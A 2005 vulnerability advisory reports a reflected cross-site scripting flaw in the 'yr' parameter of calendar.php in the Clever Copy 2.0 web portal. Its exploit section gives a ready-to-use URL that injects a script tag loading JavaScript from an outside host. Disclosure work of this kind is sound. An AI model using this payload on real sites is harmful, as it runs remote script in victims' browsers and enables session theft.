Clever copy 'calendar.php' 'yr' variable cross site scripting

################################################
Clever copy 'calendar.php' 'yr' variable cross site scripting
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-calendarphp-yr-variable.html
vendor notify: yes exploit available:yes
OSVDB ID:17919
Securitytracker: 1014492
BID: 14278
################################################

Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System

Clever Copy contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate 'yr'
variable upon submission to 'calendar.php' script.This could allow a
user to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity

##############
VERSIONS
##############

Clever Copy version 2.0a
Clever Copy version 2.0

##############
SOLUTION
##############

No solution at this time

##############
TIMELINE
##############

Discovered: 12-07-2005
Vendor notify: 13-07-2005
Vendor response:14-07-2005
Disclosure: 15-07-2005

##############
EXPLOIT
##############

http://[victim]/calendar.php?mth=3&yr=2006"><script src="http://www.drorshalev.com/dev/injection/js.js"></script>

######################## €nd #############################

Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente...

Lostmon Blogger